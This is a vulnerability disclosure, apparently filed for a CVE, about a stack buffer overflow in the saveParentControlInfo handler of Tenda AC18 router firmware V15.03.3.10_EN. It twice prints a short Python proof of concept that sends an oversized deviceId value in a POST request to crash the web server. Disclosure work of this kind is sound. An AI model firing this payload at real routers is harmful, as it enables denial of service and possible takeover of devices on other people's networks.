Tenda AC18 V15.03.3.10_EN
Tenda AC18 V15.03.3.10_EN
The Tenda AC18 V15.03.3.10_EN has a buffer overflow vulnerability located in the saveParentControlInfo function.The src variable receives the deviceId parameter from a POST request. However, since there is no size check, the user-provided deviceId can leads to a buffer overflow when passes it to the strcpy function. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.
# saveParentControlInfo_1
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/saveParentControlInfo"
data = {"deviceId":"a"*999}
ret = requests.post(url, data)
###Product_version
Tenda AC18
V15.03.3.10_EN
###Affected_component
the "saveParentControlInfo" function of /bin/httpd; /bin/httpd
###Attack_vector
use a simple exp to attack, like this:
#python3
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/saveParentControlInfo"
data = {"deviceId":"a"*999}
ret = requests.post(url, data)
###Discription
Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the deviceId parameter at ip/goform/saveParentControlInfo.
###Refernce
<https://palm-vertebra-fe9.notion.site/saveParentControlInfo_1-7c9695d0251945ae8006db705b9b80ac>
<https://www.tendacn.com/hk/download/detail-3863.html>
<https://www.tendacn.com/hk/download/detail-3852.html>